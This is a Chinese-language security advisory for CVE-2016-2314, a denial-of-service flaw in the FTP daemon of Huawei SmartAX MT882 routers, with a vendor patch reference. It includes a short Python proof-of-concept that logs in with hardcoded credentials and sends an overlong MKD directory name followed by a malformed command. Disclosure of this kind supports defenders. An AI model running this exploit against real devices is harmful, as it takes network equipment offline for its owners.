发布日期：2016-02-15
更新日期：2016-02-16

受影响系统：

Huawei SmartAX MT882 V200R002B022 Arg

描述：

---

CVE(CAN) ID: CVE-2016-2314

Huawei SmartAX MT882是一款路由器产品。

Huawei SmartAX MT882设备V200R002B022 Arg中，GlobespanVirata ftpd 1.0允许远程用户用FTP MKD命令创建较长名称的目录，然后用其他命令，造成拒绝服务。

<*来源：Déborah Valeria Higa
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Déborah Valeria Higa （）提供了如下测试方法：


import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.0.0.2', 21))
s.send('USER admin\r\n')
s.send('PASS tomenague\r\n')
print s.recv(4096)
s.send('MKD ' + 'A'*0xFA + '\r\n')
s.send('DMK A\r\n')
s.send('QUIT\r\n')
print s.recv(4096)

建议：

---

厂商补丁：

Huawei
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://support.huawei.com/enterprise/

参考：https://debihiga.wordpress.com/sa-ftp/

浏览次数：1830
严重程度：0（网友投票）